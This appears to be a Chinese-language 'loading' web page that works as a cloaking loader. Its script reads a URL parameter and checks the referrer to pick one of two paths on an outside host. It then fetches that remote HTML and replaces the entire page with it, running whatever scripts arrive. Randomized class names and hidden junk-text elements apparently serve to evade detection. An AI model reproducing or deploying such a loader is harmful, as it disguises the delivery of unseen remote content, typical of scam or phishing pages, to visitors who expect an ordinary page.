<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WrsLt5m3IrD {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WrsLt5m3IrD .M72XVjoE4Q7 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WrsLt5m3IrD .content {
            line-height: 50px;
            text-align: center
        }

        .WrsLt5m3IrD .img {
            width: 100%
        }

        .WrsLt5m3IrD .tMMSqV {
            text-align: center
        }

        .WrsLt5m3IrD .tMMSqV span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WrsLt5m3IrD .tMMSqV span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WrsLt5m3IrD .tMMSqV span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WrsLt5m3IrD .tMMSqV span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WrsLt5m3IrD .tMMSqV span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WrsLt5m3IrD .tMMSqV span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WrsLt5m3IrD .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UJWLEyueMevB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var g2guu = UJWLEyueMevB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ g2guu +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ g2guu +".html?a=share";
		}
		
        qaWQldxRMs=url+"#"+new Date().getTime();
        qaWQldxRMs && function() {
            $.get(qaWQldxRMs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Gx24O9XG6t6OUAnY42MrHzM70fHTMlHXdp3YML3ZLEum5cOqTQqihHURln4JZJH1qC</b>
<a  href='#' style='display:none'>J9hojX1oViDN2PzhvDkIpFBoXJHAbfzFZJ3jObCv1Z</a>
<div style='display:none'>r1p5NmrKPrlKfRsPQ5Z8X3tDCdxA6KOjrlAi</div>
<ul style='display:none' >HVyksfciHqX7zQvCgjvXQAga4BffsD82ttAVWoaUeFaotuPHDFswW9791khwp9p1Kl2q9KkhiSfghHBaaupmgkmqcDaz7</ul>
<div style='display:none'>r1p5NmrKPrlKfRsPQ5Z8X3tDCdxA6KOjrlAi</div>
<ul style='display:none' >HVyksfciHqX7zQvCgjvXQAga4BffsD82ttAVWoaUeFaotuPHDFswW9791khwp9p1Kl2q9KkhiSfghHBaaupmgkmqcDaz7</ul>
<b style='display:none' >Gx24O9XG6t6OUAnY42MrHzM70fHTMlHXdp3YML3ZLEum5cOqTQqihHURln4JZJH1qC</b>
<li style='display:none' >Rzz0TWNCfC4WT6Ec2ZMDssIlgp5xHeOEtzDRE5QlHAa2MdLMK4QunZKNkiAqr69BgQsojGXVocKaMnmX0GoCaLqF6O4NCG</li>
<h1 style='display:none' >q5e6bU35Q18Q6TsO4zIOMIn6yHIvpkytphmnE0UNcoyGf5T6pulzLh2Yr</h1>
<p  style='display:none'>d206UOB1d5ZtyXeE4WjPLbYjccUWx6HEzqkGcx4af2vq9KRARdHNEP1gROtQvdm8lj5oCnM0xzS7jSl8GuroY0BiXxadfcbF5PWvj</p><div class="WrsLt5m3IrD">
    <div class="M72XVjoE4Q7">
        <div class="tMMSqV">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >oWVm9x4INi7H6VSeMJlnNqAehKmlqgvlFSbMS4YaZ8BvHBWGMMtvZKKTDhfPJT3NSNFx8gq</li>
<h1 style='display:none' >l2YGhATosAZWjsZ5iijJ3atOrLnyUAETopgcx4qQtqGHzbMyxJPedqw7zZM5PNJanlkeg2P2G84BiRXlMGKNx4jt37tDBhLeN</h1>
<img  src='' style='display:none'></body>
</html>